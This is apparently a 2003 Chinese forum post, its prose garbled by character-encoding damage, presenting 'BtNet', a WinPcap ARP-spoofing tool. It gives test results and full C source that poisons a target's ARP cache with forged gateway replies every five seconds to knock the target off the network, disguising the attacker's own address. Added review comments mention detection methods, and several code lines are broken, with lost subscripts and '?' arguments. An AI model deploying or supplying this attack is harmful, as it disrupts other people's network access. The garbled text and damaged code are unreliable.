written by Ruder Homepage:http://xEyes.cdut.net/ruder/ && http://www.cnwill.com/ruder/ Email:cocoruder@163.com
×î½ü¿ªÊ¼Ñ§WINPCAP£¬¿´Á˺ܶà¸ßÊÖдµÄ»ùÓÚarpÆÛƵÄ×¥°ü¹¤¾ß£¬ÓÈÆäÊǵç×Ó¿Æ´óµÄTOo2yʦÐֵġ¶Ïê̸µ÷ÓÃwinpcapÇý¶¯Ð´arp¶à¹¦Äܹ¤¾ß¡·£¬ÁîÎÒÊÕÒæ·Çdz¡£ÏÂÃæÊÇÎÒ°ÑÕâ¸ö˼Ïë¸Ä³Éarp¹¥»÷³ÌÐò(¿ÉÁîÄ¿±êÖ÷»ú¶Ï¿ªÍøÂçÁ¬½Ó)µÄһЩ²âÊÔ¡£¸ßÊÖÇëÂÔ¹ý£¬ÒÔÃâÓаàÃÅŪ¸«Ö®ÏС£ Ò»°ãµÄarp spoofÊÇÏò±»ÆÛÆÖ÷»ú·¢ËÍARP REPLYÊý¾Ý±¨,°ÑÆäÖеÄÔ´IPµØÖ·ÖÃΪ±»ÆÛÆÖ÷»úÒª·¢°üÈ¥µÄÖ÷»úµØÖ·£¬Ô´MACµØÖ·È´¸ÄΪ×Ô¼ºµÄMACµØÖ·¡£¼ÙÉèÓÐÁ½Ì¨»úÆ÷A,B£¬·¢ËÍÒ»¸öARP REPLYÊý¾Ý±¨¸øA,ÆäÖÐÔ´IPµØַΪBµÄµØÖ·,Ô´MACµØַΪÎҵĻúÆ÷µÄMACµØÖ·(IPRouter¹¦ÄÜ´ò¿ªÈ·±£Êý¾Ý±»×ª·¢)£¬ÄÇôA·¢Ë͵½BµÄÊý¾Ý±¨¾Í·¢µ½ÎҵĻúÆ÷ÉÏÁË£¬Í¬Ñù¶ÔB×öÏàͬµ½²Ù×÷£¬ÄÇôA<==>BÖ®¼äµÄÊý¾Ý¾Í»áÔ´Ô´²»¶ÏµÄͨ¹ýÎҵĻúÆ÷ת·¢£¬Ö±µ½Ò»¸öÕý³£µÄARP°ü¸ü¸ÄÁËA,BµÄarp»º´æΪֹ¡£ ÄÇôÎÒÃÇ°Ñ·¢Ë͸øAµÄarpÊý¾Ý±¨µÄÔ´IP,Ô´MAC¸ü¸Ä³ÉÈÎÒâµÄ£¬»á³öÏÖʲôÏÖÏó£¿ÏÂÃæÊÇÎҵļ¸¸ö²âÊÔ 1. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪ²»´æÔÚµÄMACµØÖ· ¶ÔÄ¿±êÖ÷»ú¼¸ºõ²»Ó°Ïì 2. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪÄÚÍøÄÚÈÎÒâһ̨´æÔÚµ«Ã»ÓпªÆôIPRouterµÄÖ÷»úµÄMACµØÖ· ¼¸ºõ²»Ó°Ïì 3. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪĿ±êÖ÷»úµÄMAC Ä¿±êÖ÷»úÁ¢¿Ì¶ÏÍø!
¿É¼ûµ±·¢Ë;¹ýÎÒÃǹ¹ÔìµÄARP REALY°ü¸øÄ¿±êÖ÷»úʱ,»áʹĿ±êÖ÷»úµÄARP»º´æ¸ü¸Ä£¬Êý¾Ý·â×°µ½MAC²ãµÄʱºò»á°ÑÍø¹ØµÄIPºÍ×Ô¼ºµÄMACµØÖ··â×°µ½Ò»Æð£¬ÄÇô·¢Ë͵½Íø¹ØµÄÊý¾Ý±¨Ö»ºÃ·¢¸ø×Ô¼ºÁË£¬ºÇºÇ¡£ ÖÁÓÚµÚ1ÖÖÇé¿ö£¬²ÂÏë´ó¸ÅÊÇÓÉÓÚMACµØÖ·²»´æÔÚ,Ä¿±êÖ÷»ú»á¹ã²¥Ò»¸öARP REQUEST°ü¶ø¸üÐÂÁË×Ô¼ºµÄARP»º´æËùÖ¡£ ÖÁÓÚµÚ2ÖÖÇé¿ö£¬²ÂÏëÔ´MACµØÖ·ËùÊôÖ÷»ú»á·µ»ØÒ»¸öARP REPLY¸øÄ¿±êÖ÷»ú¡£ ˮƽÓÐÏÞ£¬ËùÒÔÖ»ÊDzÂÏ룬֪µÀµÄÇë¸æËßÎÒÒ»Éù£¬ÏÈл¹ýÁË¡£
ÔÙ˵һÏ£¬ÒÔÉϲâÊÔÖ»¶ÔÓÚwindowsϵͳ£¬µ±È»Ò²²âÊÔ¹ý¶ÔûÓÐÅäÖúõÄRed Hat³É¹¦¹ý¡£ ²âÊÔ³ÌÐò(BtNet.exe)˵Ã÷£º Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC] -m²ÎÊýÊÇÄãÒªÐ޸ĵÄÔ´MACµØÖ·. ΪÁËÒþ±Î¹¥»÷ÕßÉí·Ý£¬³ÌÐòÔٵõ½Ä¿±êÖ÷»úMACµØַʱαװ³ÉIP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5£¬¿ÉÄÜ»áµÃ²»µ½Ä¿±êÖ÷»úµÄMACµØÖ·£¬ÄÇôҪµÃµ½MACµØÖ·Çë½èÖúµÚÈý·½¹¤¾ß¡£
¸½²âÊÔ³ÌÐò´úÂë #include "packet32.h" #include "ntddndis.h" #include <stdio.h> #include <conio.h> #include <winsock2.h> #include <windows.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

/* Ethernet type values and ARP opcodes, kept in host order and converted with htons() where used. */
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 // ARP request
#define ARP_REPLY 0x0002 // ARP reply
#define ARP_HARDWARE 0x0001 // hardware type field value
#define max_num_adapter 10 // capacity of adapterlist below

/* Wire layouts: packed so the structs can be memcpy'd straight into a frame. */
#pragma pack(push,1)
typedef struct ethdr
{
    unsigned char eh_dst[6]; // Ethernet destination address
    unsigned char eh_src[6]; // Ethernet source address
    unsigned short eh_type; // frame type (ETH_ARP for every frame built here)
}ETHDR,*PETHDR;
typedef struct arphdr // ARP header
{
    unsigned short arp_hdr; // hardware type
    unsigned short arp_pro; // protocol type
    unsigned char arp_hln; // hardware address length
    unsigned char arp_pln; // protocol address length
    unsigned short arp_opt; // opcode (ARP_REQUEST / ARP_REPLY)
    unsigned char arp_sha[6]; // sender Ethernet address
    unsigned long arp_spa; // sender IP address
    unsigned char arp_tha[6]; // target Ethernet address
    unsigned long arp_tpa; // target IP address
}ARPHDR,*PARPHDR;
/* One IP/MAC pairing; the MAC is filled in by sniff() when a reply for .ip is seen. */
typedef struct ip_mac
{
    u_long ip;
    unsigned char mac[6];
}IP_MAC,*PIP_MAC;
// NOTE(review): a second push with no matching pop; this looks like it should be pack(pop).
#pragma pack(push)

/* Process-wide state shared by main() and the worker threads; nothing below is synchronized. */
LPADAPTER lpAdapter; // adapter opened in main(), used by every send/receive call
char adapterlist[max_num_adapter][1024]; // adapter names split out of PacketGetAdapterNames()
IP_MAC toipandmac; // the -h address and its learned MAC
IP_MAC oipandmac,myipandmac; // the -o address and this host, with their learned MACs
BOOL param6=FALSE; // TRUE when -m was supplied
char *noMACstr; // raw -m argument
char noMAC[6][3]; // -m split into six two-character hex pairs (parsed by getint() in sendSR())
u_long mytoIP,oIP; // -h / -o addresses in host byte order
BOOL sendtoOip; // once TRUE, sendARPPacket() uses this host's learned IP/MAC as the sender
MSG msg; // message loop state for the timer thread
UINT newtimer; // id returned by SetTimer() in sendSRTimer(); never killed
char MYIP[20]="128.128.128.128"; // sender IP placed in the probe requests while sendtoOip is FALSE
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE; // set when the matching MAC has been learned
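/*
 * Convert one hexadecimal digit character to its numeric value.
 *
 * The listing as printed had lost the quotes around its character literals
 * (comparing against the integer 9 and undeclared names a/f/A/F); this is
 * the obvious intended form.
 *
 * @param c  the character to convert
 * @return   0..15 for '0'-'9', 'a'-'f' or 'A'-'F'; -1 for anything else
 *           (callers treat -1 as a malformed -m argument)
 */
int getint(char c)
{
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    if (c >= 'a' && c <= 'f') {
        return 10 + (c - 'a');
    }
    if (c >= 'A' && c <= 'F') {
        return 10 + (c - 'A');
    }
    return -1;
}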
/*
 * Print the banner and usage text to stdout.  Called by main() whenever the
 * command line is not accepted.  The text is emitted verbatim, one line per
 * table entry, in the original order.
 */
void start()
{
    static const char *banner[] = {
        "BtNet //--an ARP Tool test the Windows Break the Internet\n",
        "written by Ruder,10/2003\n",
        "Homepage: http://xEyes.cdut.net/ruder/index.htm\;n",
        "E-mail: cocoruder@163.com\n",
        "\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n",
        "Example:\n",
        "BtNet -h 202.115.138.12 -o 202.115.138.1\n",
        "BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n",
        " Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n",
    };
    size_t k;
    // None of the entries contains a conversion specifier, so fputs prints
    // exactly what printf printed.
    for (k = 0; k < sizeof banner / sizeof banner[0]; k++) {
        fputs(banner[k], stdout);
    }
}
/*
 * Capture thread.  Reads frames from the global lpAdapter until a key is
 * pressed (kbhit) and, for every ARP reply whose sender IP equals one of the
 * three addresses of interest, prints the sender's IP/MAC and stores the MAC
 * in the matching global entry (toipandmac, oipandmac, myipandmac), setting
 * its *_flag.  Returns as soon as all three flags are set.
 *
 * Returns 0 on every path; failures are only reported with printf.
 *
 * Passively learning IP->MAC pairs from ARP replies, as done here, is also
 * how an ARP-monitoring sensor builds the baseline it later compares
 * replies against.
 *
 * NOTE(review): the listing as printed has lost array subscripts in
 * extraction (the eh_src loops below) and is not compilable as shown.
 */
DWORD WINAPI sniff(LPVOID)
{
    LPPACKET lppackets,lpPacketr;
    char recvbuf[1024*250]; // user-side receive buffer (250 KiB)
    ULONG ulbytesreceived,off;
    ETHDR *eth;
    ARPHDR *arp;
    char *buf,*pChar,*base;
    char szTemp[20];
    struct bpf_hdr *hdr;

    // NOTE(review): lppackets is allocated here but never used or freed.
    if((lppackets=PacketAllocatePacket())==FALSE)
    {
        printf("PacketAllocatePacket send Error: %d\n",GetLastError());
        return 0;
    }
    // Non-fatal: capture continues without promiscuous mode.
    if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    }
    // Kernel-side capture buffer of 500 KiB.
    if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
    {
        printf("PacketSetBuff Error: %d\n",GetLastError());
        return 0;
    }
    // Short read timeout (1 ms) so the kbhit() checks below run often.
    if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
    {
        printf("Warning: Unable to set the timeout\n");
    }
    if((lpPacketr=PacketAllocatePacket())==FALSE)
    {
        printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
        return 0;
    }
    PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

    // NOTE(review): every return below leaves lpPacketr (and lppackets) unfreed.
    while(!kbhit())
    {
        if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
        {
            return 0;
        }
        //getdata(lppacketr,option);
        ulbytesreceived=lpPacketr->ulBytesReceived;
        buf=(char *)lpPacketr->Buffer;

        // One read may hold several frames, each preceded by a bpf_hdr.
        off=0;
        while(off<ulbytesreceived)
        {
            if(kbhit())
            {
                return 0;
            }
            hdr=(struct bpf_hdr *)(buf+off);
            off+=hdr->bh_hdrlen;

            pChar=(char *)(buf+off);
            base=pChar; // NOTE(review): assigned but never read
            off=Packet_WORDALIGN(off+hdr->bh_caplen); // advance to the next word-aligned frame

            eth=(PETHDR)pChar; // Ethernet header
            arp=(PARPHDR)(pChar+sizeof(ETHDR)); // ARP header
            // NOTE(review): bh_caplen is not checked to cover both headers before they are read.
            int i;

            if((eth->eh_type==htons(ETH_ARP))&& (arp->arp_opt==htons(ARP_REPLY)))
            {
                //if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
                {
                    // Finished once every address of interest has a MAC.
                    if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag) return 0;
                    // The .ip fields are host order (ntohl'd in main); arp_spa is wire order.
                    // htonl() serves as the byte swap here, which equals ntohl() on little-endian hosts.
                    if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
                        ||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
                        ||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
                    {
                        memset(szTemp,0,sizeof(szTemp));
                        memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));

                        printf("[IP]:");
                        printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
                        printf("[MAC]:");
                        for(i=0;i<5;i++)
                        {
                            printf("%.2x-",eth->eh_src);
                        }
                        printf("%.2x",eth->eh_src[5]);
                        printf("\n");

                        // Record the frame's source MAC against whichever entry matched.
                        if (toipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++) toipandmac.mac=eth->eh_src;
                            toipandmac_flag=TRUE;
                        }
                        if (oipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++) oipandmac.mac=eth->eh_src;
                            oipandmac_flag=TRUE;
                            // printf("if you have get the MAC Addresses enough,Press any key for staring!\n");
                        }
                        if(myipandmac.ip==htonl(arp->arp_spa))
                        {
                            for(i=0;i<6;i++) myipandmac.mac=eth->eh_src;
                            myipandmac_flag=TRUE;
                        }
                    }
                }
            }
            continue;
        }
    }
    return 0;
}
/*
 * Worker thread: sends one broadcast ARP request for the IP pointed to by
 * dwsendtoIP (a host-order u_long).  The reply is collected by sniff().
 *
 * Sender fields: by default the fixed address MYIP with every MAC octet set
 * to 0xa5; when the global sendtoOip is TRUE and this host's MAC has already
 * been learned (myipandmac_flag), the host's own IP/MAC are used instead.
 *
 * @param dwsendtoIP  pointer to the host-order IP to query; main() passes
 *                    the address of a stack local, which stays valid because
 *                    main() never returns while the threads run.
 * Returns 0 on every path.
 *
 * NOTE(review): the listing has lost array subscripts (the per-octet loops)
 * and one memcpy source argument (printed as '?') in extraction.
 */
DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
    LPPACKET lpPacket;
    ETHDR eth;
    ARPHDR arphdr;
    int i;
    char szPacketBuf[600];
    u_long sendtoIP=*(u_long *)dwsendtoIP;
    //struct sockaddr_in sin;

    lpPacket = PacketAllocatePacket();
    if(lpPacket==NULL)
    {
        printf("\nPacketAllocatePacket error!");
        return 0;
    }
    eth.eh_type=htons(ETH_ARP);
    // Broadcast destination and a 0xa5 fill for the sender MAC.  0xa5 has the
    // low (group) bit set, so no real interface carries it as a source
    // address: an easy anomaly for ARP monitoring that checks sender MACs.
    for(i=0;i<6;i++)
    {
        eth.eh_dst=0xff;
        eth.eh_src=0xa5;
        arphdr.arp_sha=0xa5;
        arphdr.arp_tha=0xff;
    }
    arphdr.arp_hdr=htons(ARP_HARDWARE);
    arphdr.arp_pro=htons(ETH_IP);
    arphdr.arp_opt=htons(ARP_REQUEST);
    arphdr.arp_hln=6;
    arphdr.arp_pln=4;

    arphdr.arp_tpa=htonl(sendtoIP);
    arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP))); // round-trips back to inet_addr(MYIP)
    if(sendtoOip)
    {
        if(myipandmac_flag)
        {
            for(i=0;i<6;i++)
            {
                eth.eh_src=myipandmac.mac;
                arphdr.arp_sha=myipandmac.mac;
                arphdr.arp_spa=htonl(myipandmac.ip); // re-assigned on every iteration; harmless
                //memset(MYIP,0,sizeof(MYIP));
            }
        }
        else
        {
            printf("My MAC Address Cant Find!\n");
            return 0; // NOTE(review): lpPacket is leaked on this path
        }
    }

    // Assemble Ethernet + ARP headers into a zeroed buffer; only the first
    // 60 bytes are handed to the driver.
    memset(szPacketBuf,0,sizeof(szPacketBuf));
    memcpy(szPacketBuf,?,sizeof(ETHDR));
    memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

    PacketInitPacket(lpPacket,szPacketBuf,60);
    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf("Error sending the packets!\n");
        PacketFreePacket(lpPacket);
        return 0;
    }
    PacketFreePacket(lpPacket);
    return 0;
}
/*
 * Timer callback installed by sendSRTimer() (fires every 5 s).  Builds and
 * sends one ARP reply addressed to the learned MAC of mytoIP (toipandmac)
 * whose sender IP is the -o address (oIP) and whose sender MAC is either the
 * six octets given with -m (param6/noMAC) or, by default, the target's own
 * MAC.  Prints "spoof <target>: <oIP>--><mac>" after each send.
 *
 * Returns 0 on every path.  Requires toipandmac_flag only; the check for
 * the other two MACs was commented out.
 *
 * This is the textbook ARP-cache-poisoning reply: a sender protocol address
 * belonging to the gateway paired with a hardware address that is not the
 * gateway's.  Dynamic ARP Inspection on the switch, a static ARP entry for
 * the gateway on the host, or an arpwatch-style monitor that compares
 * sender IP/MAC against a learned table each detect or block exactly this
 * frame.
 *
 * NOTE(review): the listing has lost array subscripts (noMAC, eh_src, ...)
 * and one memcpy source argument (printed as '?') in extraction.
 */
DWORD WINAPI sendSR()
{
    ETHDR eth;
    ARPHDR arphdr;
    int i;
    char szPacketBuf[600];
    LPPACKET lpPacket;
    unsigned char toMAC[6];
    struct sockaddr_in sin;
    u_long toIP=mytoIP;

    //if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
    //{
    //    printf("Cant get all MAC address!\n");
    //    return 0;
    //}
    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.\n");
        return 0;
    }
    if (toipandmac_flag==FALSE)
    {
        printf("Cant get toMAC address!\n");
        return 0; // NOTE(review): lpPacket leaked here and on the -m error path below
    }

    memset(toMAC,0,sizeof(toMAC));
    memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

    if (param6)
    {
        // -m given: each "xx" pair in noMAC becomes one sender-MAC octet via getint().
        for(i=0;i<6;i++)
        {
            int t1,t2;
            char c1,c2;
            c1=noMAC[0];
            c2=noMAC[1];

            t1=getint(c1);
            t2=getint(c2);

            if((t1==-1)||(t2==-1))
            {
                printf("-m parameter error!\n");
                return 0;
            }

            eth.eh_src=t1*16+t2;
            eth.eh_dst=toMAC;
            arphdr.arp_sha=t1*16+t2;
            arphdr.arp_tha=toMAC;
        }
    }
    else
    {
        // Default: sender and target hardware addresses are both the target's MAC.
        for(i=0;i<6;i++)
        {
            eth.eh_src=toMAC;
            eth.eh_dst=toMAC;
            arphdr.arp_sha=toMAC;
            arphdr.arp_tha=toMAC;
        }
    }
    eth.eh_type=htons(ETH_ARP);

    arphdr.arp_spa=htonl(oIP); // sender IP: the -o address
    arphdr.arp_tpa=htonl(toIP); // target IP: the -h address

    arphdr.arp_hdr=htons(ARP_HARDWARE);
    arphdr.arp_pro=htons(ETH_IP);
    arphdr.arp_opt=htons(ARP_REPLY);
    arphdr.arp_hln=6;
    arphdr.arp_pln=4;

    memset(szPacketBuf,0,sizeof(szPacketBuf));
    memcpy(szPacketBuf,?,sizeof(ETHDR));
    memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

    PacketInitPacket(lpPacket,szPacketBuf,60);
    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
    if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
    {
        printf("Error sending the packets!\n");
        PacketFreePacket(lpPacket);
        return 0;
    }
    PacketFreePacket(lpPacket);

    // Report: target IP, then the claimed sender IP and the MAC it was bound to.
    sin.sin_addr.s_addr=arphdr.arp_tpa;
    printf("spoof %s: ",inet_ntoa(sin.sin_addr));
    sin.sin_addr.s_addr=arphdr.arp_spa;
    printf("%s-->",inet_ntoa(sin.sin_addr));
    for(i=0;i<5;i++) printf("%.2x-",arphdr.arp_sha);
    printf("%x",arphdr.arp_sha[5]); // NOTE(review): last octet uses %x, not %.2x like the others
    printf("\n");
    return 0;
}
/*
 * Timer thread: stores the target IP in the global mytoIP, installs sendSR
 * as a 5-second timer callback and runs a message loop so the timer can
 * fire.  The loop ends only when GetMessage() returns 0 (WM_QUIT), which
 * nothing in this file posts, so the thread normally runs until the process
 * is terminated.
 *
 * @param dwtoIP  pointer to the host-order target IP (main() passes &toIP).
 * Returns 0.
 *
 * NOTE(review): sendSR is declared with no parameters but is installed as a
 * TIMERPROC, which is invoked with four; the cast hides the mismatch.  The
 * timer is never removed with KillTimer().
 */
DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
    printf("Waiting spoof Start\n");
    mytoIP=*(u_long *)dwtoIP;
    newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR)); // period in milliseconds
    while(GetMessage(&msg,0,0,0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    return 0;
}
/*
 * Entry point.  Command line: -h attackIP -o gateIP [-m spoofedMAC]
 * (argc must be 5 or 7).  Steps:
 *   1. parse the two IPs (and the optional -m MAC into noMAC);
 *   2. list the adapters from PacketGetAdapterNames(), let the user pick
 *      one, open it and print its link type, broadcast, mask and IP;
 *   3. start sniff(), probe the three IPs with sendARPPacket() (ordered by
 *      Sleep() calls only), then start sendSRTimer() and wait on it.
 * Returns 0 on success or after printing usage, -1 on adapter errors.
 *
 * NOTE(review): the listing has lost the quotes on character literals
 * ('\0' printed as \0) and array subscripts (adapterlist, noMAC) in
 * extraction and is not compilable as printed.
 */
int main(int argc,char *argv[])
{
    HANDLE thread1,thread2,thread3;
    WCHAR adaptername[8192]; // NUL-separated, double-NUL-terminated list of wide adapter names
    WCHAR *name1,*name2;
    ULONG adapterlength;
    DWORD threadid1,threadid2,threadid3;
    u_long toIP,myip;
    struct NetType ntype;
    struct sockaddr_in sin;
    struct npf_if_addr ipbuff;
    int adapternum=0,opti=0,open,i,j; // opti and j are never used
    long npflen;

    if((argc!=5)&&(argc!=7))
    {
        start();
        return 0;
    }
    else if((strcmp(argv[1],"-h")!=0)||(strcmp(argv[3],"-o")!=0))
    {
        start();
        return 0;
    }
    // NOTE(review): inet_addr() results are not checked against INADDR_NONE.
    toIP=ntohl(inet_addr(argv[2]));
    oIP=ntohl(inet_addr(argv[4]));

    // argv[argc] is NULL, so this is safe with argc==5; with argc==7 and a
    // fifth argument other than -m the extra arguments are silently ignored.
    if (argv[5]!=NULL)
    {
        if (strcmp(argv[5],"-m")==0)
        {
            noMACstr=argv[6];
            j=0;
            // Copies six "xx" pairs at stride 3 ("xx-xx-...").  The argument's
            // length is never validated, so a shorter string is over-read.
            for(i=0;i<6;i++)
            {
                memset(noMAC,0,sizeof(noMAC));
                memcpy(noMAC,noMACstr,2);
                noMACstr=noMACstr+3;
            }
            param6=TRUE;
        }
    }
    printf("\nLibarary Version: %s",PacketGetVersion());
    adapterlength=sizeof(adaptername);
    if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) // get the adapter list
    {
        printf("PacketGetAdapterNames Error: %d\n",GetLastError());
        return -1;
    }

    // Split the list into adapterlist, stopping at the double NUL.
    // NOTE(review): *(name1-1) reads before the array when the list starts
    // with a NUL, and the count is not bounded by max_num_adapter.
    name1=adaptername;
    name2=adaptername;
    i=0;
    while((*name1!=\0) || (*(name1-1)!=\0))
    {
        if(*name1==\0)
        {
            memcpy(adapterlist,name2,2*(name1-name2)); // 2 bytes per WCHAR
            name2=name1+1;
            i++;
        }
        name1++;
    }
    adapternum=i;
    printf("\nAdapters Installed:\n");
    for(i=0;i<adapternum;i++)
        wprintf(L"%d - %s\n",i+1,adapterlist);

    // NOTE(review): scanf's return is unchecked; on non-numeric input `open`
    // stays uninitialized and the unread input keeps this loop spinning.
    do
    {
        printf("\nSelect the number of the adapter to open: ");
        scanf("%d",&open);
        if(open>=1 && open<=adapternum) break;
    }while(open<1 || open>adapternum);

    lpAdapter=PacketOpenAdapter(adapterlist[open-1]);
    if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("PacketOpenAdapter Error: %d\n",GetLastError());
        return -1;
    }
    if(PacketGetNetType(lpAdapter,&ntype))
    {
        printf("\n\t\t*** Host Information ***\n");
        printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
        printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed); // NOTE(review): LinkSpeed is a 64-bit field in WinPcap's NetType, so %d is the wrong width - confirm
    }

    npflen=sizeof(ipbuff);
    if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
    {
        sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
        printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));
        sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
        printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));
        sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
        printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
        myip=ntohl(sin.sin_addr.s_addr); // this host's IP in host order
        printf("[MACAddress:]"); // label only; nothing is printed after it here
    }
    else
    {
        printf("\nNot get enough data\n");
        //PacketFreePacket(lppackets);
        PacketCloseAdapter(lpAdapter);
        return -1;
    }
    printf("\n");

    oipandmac.ip=oIP;
    toipandmac.ip=toIP;
    myipandmac.ip=myip;
    sendtoOip=FALSE;

    // Probe order: own IP, then the -h address, then (with sendtoOip set so
    // the real source MAC is used) the -o address.  The Sleep() calls are the
    // only ordering between the threads; the globals they share are not
    // synchronized.  thread1 is never waited on or closed.
    thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
    Sleep(300);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
    Sleep(100);
    CloseHandle(thread2);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
    Sleep(10);
    CloseHandle(thread2);
    sendtoOip=TRUE;
    Sleep(200);
    thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
    Sleep(10);
    CloseHandle(thread2);
    // WaitForSingleObject(thread1,INFINITE);
    // sendSRTimer's message loop does not return on its own, so the close
    // below is reached only if that thread exits.
    thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
    WaitForSingleObject(thread3,INFINITE);
    PacketCloseAdapter(lpAdapter);
    return 0;
}